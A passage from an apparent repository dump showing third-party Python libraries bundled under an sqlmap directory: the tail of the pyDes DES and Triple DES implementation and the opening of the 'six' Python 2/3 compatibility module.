key[28:]\n\t\twhile i < 16:\n\t\t\tj = 0\n\t\t\t# Perform circular left shifts\n\t\t\twhile j < des.__left_rotations[i]:\n\t\t\t\tself.L.append(self.L[0])\n\t\t\t\tdel self.L[0]\n\n\t\t\t\tself.R.append(self.R[0])\n\t\t\t\tdel self.R[0]\n\n\t\t\t\tj += 1\n\n\t\t\t# Create one of the 16 subkeys through pc2 permutation\n\t\t\tself.Kn[i] = self.__permutate(des.__pc2, self.L + self.R)\n\n\t\t\ti += 1\n\n\t# Main part of the encryption algorithm, the number cruncher :)\n\tdef __des_crypt(self, block, crypt_type):\n\t\t\"\"\"Crypt the block of data through DES bit-manipulation\"\"\"\n\t\tblock = self.__permutate(des.__ip, block)\n\t\tself.L = block[:32]\n\t\tself.R = block[32:]\n\n\t\t# Encryption starts from Kn[1] through to Kn[16]\n\t\tif crypt_type == des.ENCRYPT:\n\t\t\titeration = 0\n\t\t\titeration_adjustment = 1\n\t\t# Decryption starts from Kn[16] down to Kn[1]\n\t\telse:\n\t\t\titeration = 15\n\t\t\titeration_adjustment = -1\n\n\t\ti = 0\n\t\twhile i < 16:\n\t\t\t# Make a copy of R[i-1], this will later become L[i]\n\t\t\ttempR = self.R[:]\n\n\t\t\t# Permutate R[i - 1] to start creating R[i]\n\t\t\tself.R = self.__permutate(des.__expansion_table, self.R)\n\n\t\t\t# Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here\n\t\t\tself.R = list(map(lambda x, y: x ^ y, self.R, self.Kn[iteration]))\n\t\t\tB = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]]\n\t\t\t# Optimization: Replaced below commented code with above\n\t\t\t#j = 0\n\t\t\t#B = []\n\t\t\t#while j < len(self.R):\n\t\t\t#\tself.R[j] = self.R[j] ^ self.Kn[iteration][j]\n\t\t\t#\tj += 1\n\t\t\t#\tif j % 6 == 0:\n\t\t\t#\t\tB.append(self.R[j-6:j])\n\n\t\t\t# Permutate B[1] to B[8] using the S-Boxes\n\t\t\tj = 0\n\t\t\tBn = [0] * 32\n\t\t\tpos = 0\n\t\t\twhile j < 8:\n\t\t\t\t# Work out the offsets\n\t\t\t\tm = (B[j][0] << 1) + B[j][5]\n\t\t\t\tn = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4]\n\n\t\t\t\t# Find the permutation value\n\t\t\t\tv = des.__sbox[j][(m << 4) + n]\n\n\t\t\t\t# Turn value into bits, add it to result: Bn\n\t\t\t\tBn[pos] = (v & 8) >> 3\n\t\t\t\tBn[pos + 1] = (v & 4) >> 2\n\t\t\t\tBn[pos + 2] = (v & 2) >> 1\n\t\t\t\tBn[pos + 3] = v & 1\n\n\t\t\t\tpos += 4\n\t\t\t\tj += 1\n\n\t\t\t# Permutate the concatination of B[1] to B[8] (Bn)\n\t\t\tself.R = self.__permutate(des.__p, Bn)\n\n\t\t\t# Xor with L[i - 1]\n\t\t\tself.R = list(map(lambda x, y: x ^ y, self.R, self.L))\n\t\t\t# Optimization: This now replaces the below commented code\n\t\t\t#j = 0\n\t\t\t#while j < len(self.R):\n\t\t\t#\tself.R[j] = self.R[j] ^ self.L[j]\n\t\t\t#\tj += 1\n\n\t\t\t# L[i] becomes R[i - 1]\n\t\t\tself.L = tempR\n\n\t\t\ti += 1\n\t\t\titeration += iteration_adjustment\n\n\t\t# Final permutation of R[16]L[16]\n\t\tself.final = self.__permutate(des.__fp, self.R + self.L)\n\t\treturn self.final\n\n\n\t# Data to be encrypted/decrypted\n\tdef crypt(self, data, crypt_type):\n\t\t\"\"\"Crypt the data in blocks, running it through des_crypt()\"\"\"\n\n\t\t# Error check the data\n\t\tif not data:\n\t\t\treturn ''\n\t\tif len(data) % self.block_size != 0:\n\t\t\tif crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks\n\t\t\t\traise ValueError(\"Invalid data length, data must be a multiple of \" + str(self.block_size) + \" bytes\\n.\")\n\t\t\tif not self.getPadding():\n\t\t\t\traise ValueError(\"Invalid data length, data must be a multiple of \" + str(self.block_size) + \" bytes\\n. Try setting the optional padding character\")\n\t\t\telse:\n\t\t\t\tdata += (self.block_size - (len(data) % self.block_size)) * self.getPadding()\n\t\t\t# print \"Len of data: %f\" % (len(data) / self.block_size)\n\n\t\tif self.getMode() == CBC:\n\t\t\tif self.getIV():\n\t\t\t\tiv = self.__String_to_BitList(self.getIV())\n\t\t\telse:\n\t\t\t\traise ValueError(\"For CBC mode, you must supply the Initial Value (IV) for ciphering\")\n\n\t\t# Split the data into blocks, crypting each one seperately\n\t\ti = 0\n\t\tdict = {}\n\t\tresult = []\n\t\t#cached = 0\n\t\t#lines = 0\n\t\twhile i < len(data):\n\t\t\t# Test code for caching encryption results\n\t\t\t#lines += 1\n\t\t\t#if dict.has_key(data[i:i+8]):\n\t\t\t\t#print \"Cached result for: %s\" % data[i:i+8]\n\t\t\t#\tcached += 1\n\t\t\t#\tresult.append(dict[data[i:i+8]])\n\t\t\t#\ti += 8\n\t\t\t#\tcontinue\n\n\t\t\tblock = self.__String_to_BitList(data[i:i+8])\n\n\t\t\t# Xor with IV if using CBC mode\n\t\t\tif self.getMode() == CBC:\n\t\t\t\tif crypt_type == des.ENCRYPT:\n\t\t\t\t\tblock = list(map(lambda x, y: x ^ y, block, iv))\n\t\t\t\t\t#j = 0\n\t\t\t\t\t#while j < len(block):\n\t\t\t\t\t#\tblock[j] = block[j] ^ iv[j]\n\t\t\t\t\t#\tj += 1\n\n\t\t\t\tprocessed_block = self.__des_crypt(block, crypt_type)\n\n\t\t\t\tif crypt_type == des.DECRYPT:\n\t\t\t\t\tprocessed_block = list(map(lambda x, y: x ^ y, processed_block, iv))\n\t\t\t\t\t#j = 0\n\t\t\t\t\t#while j < len(processed_block):\n\t\t\t\t\t#\tprocessed_block[j] = processed_block[j] ^ iv[j]\n\t\t\t\t\t#\tj += 1\n\t\t\t\t\tiv = block\n\t\t\t\telse:\n\t\t\t\t\tiv = processed_block\n\t\t\telse:\n\t\t\t\tprocessed_block = self.__des_crypt(block, crypt_type)\n\n\n\t\t\t# Add the resulting crypted block to our list\n\t\t\t#d = self.__BitList_to_String(processed_block)\n\t\t\t#result.append(d)\n\t\t\tresult.append(self.__BitList_to_String(processed_block))\n\t\t\t#dict[data[i:i+8]] = d\n\t\t\ti += 8\n\n\t\t# print \"Lines: %d, cached: %d\" % (lines, cached)\n\n\t\t# Return the full crypted string\n\t\tif _pythonMajorVersion < 3:\n\t\t\treturn ''.join(result)\n\t\telse:\n\t\t\treturn bytes.fromhex('').join(result)\n\n\tdef encrypt(self, data, pad=None, padmode=None):\n\t\t\"\"\"encrypt(data, [pad], [padmode]) -> bytes\n\n\t\tdata : Bytes to be encrypted\n\t\tpad  : Optional argument for encryption padding. Must only be one byte\n\t\tpadmode : Optional argument for overriding the padding mode.\n\n\t\tThe data must be a multiple of 8 bytes and will be encrypted\n\t\twith the already specified key. Data does not have to be a\n\t\tmultiple of 8 bytes if the padding character is supplied, or\n\t\tthe padmode is set to PAD_PKCS5, as bytes will then added to\n\t\tensure the be padded data is a multiple of 8 bytes.\n\t\t\"\"\"\n\t\tdata = self._guardAgainstUnicode(data)\n\t\tif pad is not None:\n\t\t\tpad = self._guardAgainstUnicode(pad)\n\t\tdata = self._padData(data, pad, padmode)\n\t\treturn self.crypt(data, des.ENCRYPT)\n\n\tdef decrypt(self, data, pad=None, padmode=None):\n\t\t\"\"\"decrypt(data, [pad], [padmode]) -> bytes\n\n\t\tdata : Bytes to be encrypted\n\t\tpad  : Optional argument for decryption padding. Must only be one byte\n\t\tpadmode : Optional argument for overriding the padding mode.\n\n\t\tThe data must be a multiple of 8 bytes and will be decrypted\n\t\twith the already specified key. In PAD_NORMAL mode, if the\n\t\toptional padding character is supplied, then the un-encrypted\n\t\tdata will have the padding characters removed from the end of\n\t\tthe bytes. This pad removal only occurs on the last 8 bytes of\n\t\tthe data (last data block). In PAD_PKCS5 mode, the special\n\t\tpadding end markers will be removed from the data after decrypting.\n\t\t\"\"\"\n\t\tdata = self._guardAgainstUnicode(data)\n\t\tif pad is not None:\n\t\t\tpad = self._guardAgainstUnicode(pad)\n\t\tdata = self.crypt(data, des.DECRYPT)\n\t\treturn self._unpadData(data, pad, padmode)\n\n\n\n#############################################################################\n# \t\t\t\tTriple DES\t\t\t\t    #\n#############################################################################\nclass triple_des(_baseDes):\n\t\"\"\"Triple DES encryption/decrytpion class\n\n\tThis algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or\n\tthe DES-EDE2 (when a 16 byte key is supplied) encryption methods.\n\tSupports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes.\n\n\tpyDes.des(key, [mode], [IV])\n\n\tkey  -> Bytes containing the encryption key, must be either 16 or\n\t        24 bytes long\n\tmode -> Optional argument for encryption type, can be either pyDes.ECB\n\t\t(Electronic Code Book), pyDes.CBC (Cypher Block Chaining)\n\tIV   -> Optional Initial Value bytes, must be supplied if using CBC mode.\n\t\tMust be 8 bytes in length.\n\tpad  -> Optional argument, set the pad character (PAD_NORMAL) to use\n\t\tduring all encrypt/decrpt operations done with this instance.\n\tpadmode -> Optional argument, set the padding mode (PAD_NORMAL or\n\t\tPAD_PKCS5) to use during all encrypt/decrpt operations done\n\t\twith this instance.\n\t\"\"\"\n\tdef __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL):\n\t\t_baseDes.__init__(self, mode, IV, pad, padmode)\n\t\tself.setKey(key)\n\n\tdef setKey(self, key):\n\t\t\"\"\"Will set the crypting key for this object. Either 16 or 24 bytes long.\"\"\"\n\t\tself.key_size = 24  # Use DES-EDE3 mode\n\t\tif len(key) != self.key_size:\n\t\t\tif len(key) == 16: # Use DES-EDE2 mode\n\t\t\t\tself.key_size = 16\n\t\t\telse:\n\t\t\t\traise ValueError(\"Invalid triple DES key size. Key must be either 16 or 24 bytes long\")\n\t\tif self.getMode() == CBC:\n\t\t\tif not self.getIV():\n\t\t\t\t# Use the first 8 bytes of the key\n\t\t\t\tself._iv = key[:self.block_size]\n\t\t\tif len(self.getIV()) != self.block_size:\n\t\t\t\traise ValueError(\"Invalid IV, must be 8 bytes in length\")\n\t\tself.__key1 = des(key[:8], self._mode, self._iv,\n\t\t\t\t  self._padding, self._padmode)\n\t\tself.__key2 = des(key[8:16], self._mode, self._iv,\n\t\t\t\t  self._padding, self._padmode)\n\t\tif self.key_size == 16:\n\t\t\tself.__key3 = self.__key1\n\t\telse:\n\t\t\tself.__key3 = des(key[16:], self._mode, self._iv,\n\t\t\t\t\t  self._padding, self._padmode)\n\t\t_baseDes.setKey(self, key)\n\n\t# Override setter methods to work on all 3 keys.\n\n\tdef setMode(self, mode):\n\t\t\"\"\"Sets the type of crypting mode, pyDes.ECB or pyDes.CBC\"\"\"\n\t\t_baseDes.setMode(self, mode)\n\t\tfor key in (self.__key1, self.__key2, self.__key3):\n\t\t\tkey.setMode(mode)\n\n\tdef setPadding(self, pad):\n\t\t\"\"\"setPadding() -> bytes of length 1. Padding character.\"\"\"\n\t\t_baseDes.setPadding(self, pad)\n\t\tfor key in (self.__key1, self.__key2, self.__key3):\n\t\t\tkey.setPadding(pad)\n\n\tdef setPadMode(self, mode):\n\t\t\"\"\"Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5\"\"\"\n\t\t_baseDes.setPadMode(self, mode)\n\t\tfor key in (self.__key1, self.__key2, self.__key3):\n\t\t\tkey.setPadMode(mode)\n\n\tdef setIV(self, IV):\n\t\t\"\"\"Will set the Initial Value, used in conjunction with CBC mode\"\"\"\n\t\t_baseDes.setIV(self, IV)\n\t\tfor key in (self.__key1, self.__key2, self.__key3):\n\t\t\tkey.setIV(IV)\n\n\tdef encrypt(self, data, pad=None, padmode=None):\n\t\t\"\"\"encrypt(data, [pad], [padmode]) -> bytes\n\n\t\tdata : bytes to be encrypted\n\t\tpad  : Optional argument for encryption padding. Must only be one byte\n\t\tpadmode : Optional argument for overriding the padding mode.\n\n\t\tThe data must be a multiple of 8 bytes and will be encrypted\n\t\twith the already specified key. Data does not have to be a\n\t\tmultiple of 8 bytes if the padding character is supplied, or\n\t\tthe padmode is set to PAD_PKCS5, as bytes will then added to\n\t\tensure the be padded data is a multiple of 8 bytes.\n\t\t\"\"\"\n\t\tENCRYPT = des.ENCRYPT\n\t\tDECRYPT = des.DECRYPT\n\t\tdata = self._guardAgainstUnicode(data)\n\t\tif pad is not None:\n\t\t\tpad = self._guardAgainstUnicode(pad)\n\t\t# Pad the data accordingly.\n\t\tdata = self._padData(data, pad, padmode)\n\t\tif self.getMode() == CBC:\n\t\t\tself.__key1.setIV(self.getIV())\n\t\t\tself.__key2.setIV(self.getIV())\n\t\t\tself.__key3.setIV(self.getIV())\n\t\t\ti = 0\n\t\t\tresult = []\n\t\t\twhile i < len(data):\n\t\t\t\tblock = self.__key1.crypt(data[i:i+8], ENCRYPT)\n\t\t\t\tblock = self.__key2.crypt(block, DECRYPT)\n\t\t\t\tblock = self.__key3.crypt(block, ENCRYPT)\n\t\t\t\tself.__key1.setIV(block)\n\t\t\t\tself.__key2.setIV(block)\n\t\t\t\tself.__key3.setIV(block)\n\t\t\t\tresult.append(block)\n\t\t\t\ti += 8\n\t\t\tif _pythonMajorVersion < 3:\n\t\t\t\treturn ''.join(result)\n\t\t\telse:\n\t\t\t\treturn bytes.fromhex('').join(result)\n\t\telse:\n\t\t\tdata = self.__key1.crypt(data, ENCRYPT)\n\t\t\tdata = self.__key2.crypt(data, DECRYPT)\n\t\t\treturn self.__key3.crypt(data, ENCRYPT)\n\n\tdef decrypt(self, data, pad=None, padmode=None):\n\t\t\"\"\"decrypt(data, [pad], [padmode]) -> bytes\n\n\t\tdata : bytes to be encrypted\n\t\tpad  : Optional argument for decryption padding. Must only be one byte\n\t\tpadmode : Optional argument for overriding the padding mode.\n\n\t\tThe data must be a multiple of 8 bytes and will be decrypted\n\t\twith the already specified key. In PAD_NORMAL mode, if the\n\t\toptional padding character is supplied, then the un-encrypted\n\t\tdata will have the padding characters removed from the end of\n\t\tthe bytes. This pad removal only occurs on the last 8 bytes of\n\t\tthe data (last data block). In PAD_PKCS5 mode, the special\n\t\tpadding end markers will be removed from the data after\n\t\tdecrypting, no pad character is required for PAD_PKCS5.\n\t\t\"\"\"\n\t\tENCRYPT = des.ENCRYPT\n\t\tDECRYPT = des.DECRYPT\n\t\tdata = self._guardAgainstUnicode(data)\n\t\tif pad is not None:\n\t\t\tpad = self._guardAgainstUnicode(pad)\n\t\tif self.getMode() == CBC:\n\t\t\tself.__key1.setIV(self.getIV())\n\t\t\tself.__key2.setIV(self.getIV())\n\t\t\tself.__key3.setIV(self.getIV())\n\t\t\ti = 0\n\t\t\tresult = []\n\t\t\twhile i < len(data):\n\t\t\t\tiv = data[i:i+8]\n\t\t\t\tblock = self.__key3.crypt(iv,    DECRYPT)\n\t\t\t\tblock = self.__key2.crypt(block, ENCRYPT)\n\t\t\t\tblock = self.__key1.crypt(block, DECRYPT)\n\t\t\t\tself.__key1.setIV(iv)\n\t\t\t\tself.__key2.setIV(iv)\n\t\t\t\tself.__key3.setIV(iv)\n\t\t\t\tresult.append(block)\n\t\t\t\ti += 8\n\t\t\tif _pythonMajorVersion < 3:\n\t\t\t\tdata = ''.join(result)\n\t\t\telse:\n\t\t\t\tdata = bytes.fromhex('').join(result)\n\t\telse:\n\t\t\tdata = self.__key3.crypt(data, DECRYPT)\n\t\t\tdata = self.__key2.crypt(data, ENCRYPT)\n\t\t\tdata = self.__key1.crypt(data, DECRYPT)\n\t\treturn self._unpadData(data, pad, padmode)\n"
  },
  {
    "path": "sqlmap/thirdparty/six/__init__.py",
    "content": "# Copyright (c) 2010-2020 Benjamin Peterson\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"Utilities for writing code that runs on Python 2 and 3\"\"\"\n\nfrom __future__ import absolute_import\n\nimport functools\nimport itertools\nimport operator\nimport sys\nimport types\n\n__author__ = \"Benjamin Peterson <benjamin@python.org>\"\n__version__ = \"1.16.0\"\n\n\n# Useful for very coarse version differentiation.\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\nPY34 = sys.version_info[0:2] >= (3, 4)\n\nif PY3:\n    string_types = str,\n    integer_types = int,\n    class_types = type,\n    text_type = str\n    binary_type = bytes\n\n    MAXSIZE = sys.maxsize\nelse:\n    string_types = basestring,\n    integer_types = (int, long)\n    class_types = (type, types.ClassType)\n    text_type = unicode\n    binary_type = str\n\n    if sys.platform.startswith(\"java\"):\n        # Jython always uses 32 bits.\n        MAXSIZE = int((1 << 31) - 1)\n    else:\n        # It's possible to have sizeof(long) != sizeof(Py_ssize_t).\n        class X(object):\n\n            def __len__(self):\n                return 1 << 31\n        try:\n            len(X())\n        except OverflowError:\n            # 32-bit\n            MAXSIZE = int((1 << 31) - 1)\n        else:\n            # 64-bit\n            MAXSIZE = int((1 << 63) - 1)\n        del X\n\nif PY34:\n    from importlib.util import spec_from_loader\nelse:\n    spec_from_loader = None\n\n\ndef _add_doc(func, doc):\n    \"\"\"Add documentation to a function.\"\"\"\n    func.__doc__ = doc\n\n\ndef _import_module(name):\n    \"\"\"Import module, returning the module after the last dot.\"\"\"\n    __import__(name)\n    return sys.modules[name]\n\n\nclass _LazyDescr(object):\n\n    def __init__(self, name):\n        self.name = name\n\n    def __get__(self, obj, tp):\n        result = self._resolve()\n        setattr(obj, self.name, result)  # Invokes __set__.\n        try:\n            # This is a bit ugly, but it avoids running this again by\n            # removing this descriptor.\n            delattr(obj.__class__, self.name)\n        except AttributeError:\n            pass\n        return result\n\n\nclass MovedModule(_LazyDescr):\n\n    def __init__(self, name, old, new=None):\n        super(MovedModule, self).__init__(name)\n        if PY3:\n            if new is None:\n                new = name\n            self.mod = new\n        else:\n            self.mod = old\n\n    def _resolve(self):\n        return _import_module(self.mod)\n\n    def __getattr__(self, attr):\n        _module = self._resolve()\n        value = getattr(_module, attr)\n        setattr(self, attr, value)\n        return value\n\n\nclass _LazyModule(types.ModuleType):\n\n    def __init__(self, name):\n        super(_LazyModule, self).__init__(name)\n        self.__doc__ = self.__class__.__doc__\n\n    def __dir__(self):\n        attrs = [\"__doc__\", \"__name__\"]\n        attrs += [attr.name for attr in self._moved_attributes]\n        return attrs\n\n    # Subclasses should override this\n    _moved_attributes = []\n\n\nclass MovedAttribute(_LazyDescr):\n\n    def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):\n        super(MovedAttribute, self).__init__(name)\n        if PY3:\n            if new_mod is None:\n                new_mod = name\n            self.mod = new_mod\n            if new_attr is None:\n                if old_attr is None:\n                    new_attr = name\n                else:\n                    new_attr = old_attr\n            self.attr = new_attr\n        else:\n            self.mod = old_mod\n            if old_attr is None:\n                old_attr = name\n            self.attr = old_attr\n\n    def _resolve(self):\n        module = _import_module(self.mod)\n        return getattr(module, self.attr)\n\n\nclass _SixMetaPathImporter(object):\n\n    \"\"\"\n    A meta path importer to import six.moves and its submodules.\n\n    This class implements a PEP302 finder and loader. It should be compatible\n    with Python 2.5 and all existing versions of Python3\n    \"\"\"\n\n    def __init__(self, six_module_name):\n        self.name = six_module_name\n        self.known_modules = {}\n\n    def _add_module(self, mod, *fullnames):\n        for fullname in fullnames:\n            self.known_modules[self.name + \".\" + fullname] = mod\n\n    def _get_module(self, fullname):\n        return self.known_modules[self.name + \".\" + fullname]\n\n    def find_module(self, fullname, path=None):\n        if fullname in self.known_modules:\n            return self\n        return None\n\n    def find_spec(self, fullname, path, target=None):\n        if fullname in self.known_modules:\n            return spec_from_loader(fullname, self)\n        return None\n\n    def __get_module(self, fullname):\n        try:\n            return self.known_modules[fullname]\n        except KeyError:\n            raise ImportError(\"This loader does not know module \" + fullname)\n\n    def load_module(self, fullname):\n        try:\n            # in case of a reload\n            return sys.modules[fullname]\n        except KeyError:\n            pass\n        mod = self.__get_module(fullname)\n        if isinstance(mod, MovedModule):\n            mod = mod._resolve()\n        else:\n            mod.__loader__ = self\n        sys.modules[fullname] = mod\n        return mod\n\n    def is_package(self, fullname):\n        \"\"\"\n        Return true, if the named module is a package.\n\n        We need this method to get correct spec objects with\n        Python 3.4 (see PEP451)\n        \"\"\"\n        return hasattr(self.__get_module(fullname), \"__path__\")\n\n    def get_code(self, fullname):\n        \"\"\"Return None\n\n        Required, if is_package is implemented\"\"\"\n        self.__get_module(fullname)  # eventually raises ImportError\n        return None\n    get_source = get_code  # same as get_code\n\n    def create_module(self, spec):\n        return self.load_module(spec.name)\n\n    def exec_module(self, module):\n        pass\n\n_importer = _SixMetaPathImporter(__name__)\n\n\nclass _MovedItems(_LazyModule):\n\n    \"\"\"Lazy loading of moved objects\"\"\"\n    __path__ = []  # mark as package\n\n\n_moved_attributes = [\n    MovedAttribute(\"cStringIO\", \"cStringIO\", \"io\", \"StringIO\"),\n    MovedAttribute(\"filter\", \"itertools\", \"builtins\", \"ifilter\", \"filter\"),\n    MovedAttribute(\"filterfalse\", \"itertools\", \"itertools\", \"ifilterfalse\", \"filterfalse\"),\n    MovedAttribute(\"input\", \"__builtin__\", \"builtins\", \"raw_input\", \"input\"),\n    MovedAttribute(\"intern\", \"__builtin__\", \"sys\"),\n    MovedAttribute(\"map\", \"itertools\", \"builtins\", \"imap\", \"map\"),\n    MovedAttribute(\"getcwd\", \"os\", \"os\", \"getcwdu\", \"getcwd\"),\n    MovedAttribute(\"getcwdb\", \"os\", \"os\", \"getcwd\", \"getcwdb\"),\n    MovedAttribute(\"getoutput\", \"commands\", \"subprocess\"),\n    MovedAttribute(\"range\", \"__builtin__\", \"builtins\", \"xrange\", \"range\"),\n    MovedAttribute(\"reload_module\", \"__builtin__\", \"importlib\" if PY34 else \"imp\", \"reload\"),\n    MovedAttribute(\"reduce\", \"__builtin__\", \"functools\"),\n    MovedAttribute(\"shlex_quote\", \"pipes\", \"shlex\", \"quote\"),\n    MovedAttribute(\"StringIO\", \"StringIO\", \"io\"),\n    MovedAttribute(\"UserDict\", \"UserDict\", \"collections\", \"IterableUserDict\", \"UserDict\"),\n    MovedAttribute(\"UserList\", \"UserList\", \"collections\"),\n    MovedAttribute(\"UserString\", \"UserString\", \"collections\"),\n    MovedAttribute(\"xrange\", \"__builtin__\", \"builtins\", \"xrange\", \"range\"),\n    MovedAttribute(\"zip\", \"itertools\", \"builtins\", \"izip\", \"zip\"),\n    MovedAttribute(\"zip_longest\", \"itertools\", \"itertools\", \"izip_longest\", \"zip_longest\"),\n    MovedModule(\"builtins\", \"__builtin__\"),\n    MovedModule(\"configparser\", \"ConfigParser\"),\n    MovedModule(\"collections_abc\", \"collections\", \"collections.abc\" if sys.version_info >= (3, 3) else \"collections\"),\n    MovedModule(\"copyreg\", \"copy_reg\"),\n    MovedModule(\"dbm_gnu\", \"gdbm\", \"dbm.gnu\"),\n    MovedModule(\"dbm_ndbm\", \"dbm\", \"dbm.ndbm\"),\n    MovedModule(\"_dummy_thread\", \"dummy_thread\", \"_dummy_thread\" if sys.version_info < (3, 9) else \"_thread\"),\n    MovedModule(\"http_cookiejar\", \"cookielib\", \"http.cookiejar\"),\n    MovedModule(\"http_cookies\", \"Cookie\", \"http.cookies\"),\n    MovedModule(\"html_entities\", \"htmlentitydefs\", \"html.entities\"),\n    MovedModule(\"html_parser\", \"HTMLParser\", \"html.parser\"),\n    MovedModule(\"http_client\", \"httplib\", \"http.client\"),\n    MovedModule(\"email_mime_base\", \"email.MIMEBase\", \"email.mime.base\"),\n    MovedModule(\"email_mime_image\", \"email.MIMEImage\", \"email.mime.image\"),\n    MovedModule(\"email_mime_multipart\", \"email.MIMEMultipart\", \"email.mime.multipart\"),\n    MovedModule(\"email_mime_nonmultipart\", \"email.MIMENonMultipart\", \"email.mime.nonmultipart\"),\n    MovedModule(\"email_mime_text\", \"email.MIMEText\", \"email.mime.text\"),\n    MovedModule(\"BaseHTTPServer\", \"BaseHTTPServer\", \"http.server\"),\n    MovedModule(\"CGIHTTPServer\", \"CGIHTTPServer\", \"http.server\"),\n    MovedModule(\"SimpleHTTPServer\", \"SimpleHTTPServer\", \"http.server\"),\n    MovedModule(\"cPickle\", \"cPickle\", \"pickle\"),\n    MovedModule(\"queue\", \"Queue\"),\n    MovedModule(\"reprlib\", \"repr\"),\n    MovedModule(\"socketserver\", \"SocketServer\"),\n    MovedModule(\"_thread\", \"thread\", \"_thread\"),\n    MovedModule(\"tkinter\", \"Tkinter\"),\n    MovedModule(\"tkinter_dialog\", \"Dialog\", \"tkinter.dialog\"),\n    MovedModule(\"tkinter_filedialog\", \"FileDialog\", \"tkinter.filedialog\"),\n    MovedModule(\"tkinter_scrolledtext\", \"ScrolledText\", \"tkinter.scrolledtext\"),\n    MovedModule(\"tkinter_simpledialog\", \"SimpleDialog\", \"tkinter.simpledialog\"),\n    MovedModule(\"tkinter_tix\", \"Tix\", \"tkinter.tix\"),\n    MovedModule(\"tkinter_ttk\", \"ttk\", \"tkinter.ttk\"),\n    MovedModule(\"tkinter_constants\", \"Tkconstants\", \"tkinter.constants\"),\n    MovedModule(\"tkinter_dnd\", \"Tkdnd\", \"tkinter.dnd\"),\n    MovedModule(\"tkinter_colorchooser\", \"tkColorChooser\",\n                \"tkinter.colorchooser\"),\n    MovedModule(\"tkinter_commondialog\", \"tkCommonDialog\",\n                \"tkinter.commondialog\"),\n    MovedModule(\"tkinter_tkfiledialog\", \"tkFileDialog\", \"tkinter.filedialog\"),\n    MovedModule(\"tkinter_font\", \"tkFont\", \"tkinter.font\"),\n    MovedModule(\"tkinter_messagebox\", \"tkMessageBox\", \"tkinter.messagebox\"),\n    MovedModule(\"tkinter_tksimpledialog\", \"tkSimpleDialog\",\n                \"tkinter.simpledialog\"),\n    MovedModule(\"urllib_parse\", __name__ + \".moves.urllib_parse\", \"urllib.parse\"),\n    MovedModule(\"urllib_error\", __name__ + \".moves.urllib_error\", \"urllib.error\"),\n    MovedModule(\"urllib\", __name__ + \".moves.urllib\", __name__ + \".moves.urllib\"),\n    MovedModule(\"urllib_robotparser\", \"robotparser\", \"urllib.robotparser\"),\n    MovedModule(\"xmlrpc_client\", \"xmlrpclib\", \"xmlrpc.client\"),\n    MovedModule(\"xmlrpc_server\", \"SimpleXMLRPCServer\", \"xmlrpc.server\"),\n]\n# Add windows specific modules.\nif sys.platform == \"win32\":\n    _moved_attributes += [\n        MovedModule(\"winreg\", \"_winreg\"),\n    ]\n\nfor attr in _moved_attributes:\n    setattr(_MovedItems, attr.name, attr)\n    if isinstance(attr, MovedModule):\n        _importer._add_module(attr, \"moves.\" + attr.name)\ndel attr\n\n_MovedItems._moved_attributes = _moved_attributes\n\nmoves = _MovedItems(__name__ + \".moves\")\n_importer._add_module(moves, \"moves\")\n\n\nclass Module_six_moves_urllib_parse(_LazyModule):\n\n    \"\"\"Lazy loading of moved objects in six.moves.urllib_parse\"\"\"\n\n\n_urllib_parse_moved_attributes = [\n    MovedAttribute(\"ParseResult\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"SplitResult\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"parse_qs\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"parse_qsl\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"urldefrag\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"urljoin\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"urlparse\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"urlsplit\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"urlunparse\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"urlunsplit\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"quote\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"quote_plus\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"unquote\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"unquote_plus\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"unquote_to_bytes\", \"urllib\", \"urllib.parse\", \"unquote\", \"unquote_to_bytes\"),\n    MovedAttribute(\"urlencode\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"splitquery\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"splittag\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"splituser\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"splitvalue\", \"urllib\", \"urllib.parse\"),\n    MovedAttribute(\"uses_fragment\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"uses_netloc\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"uses_params\", 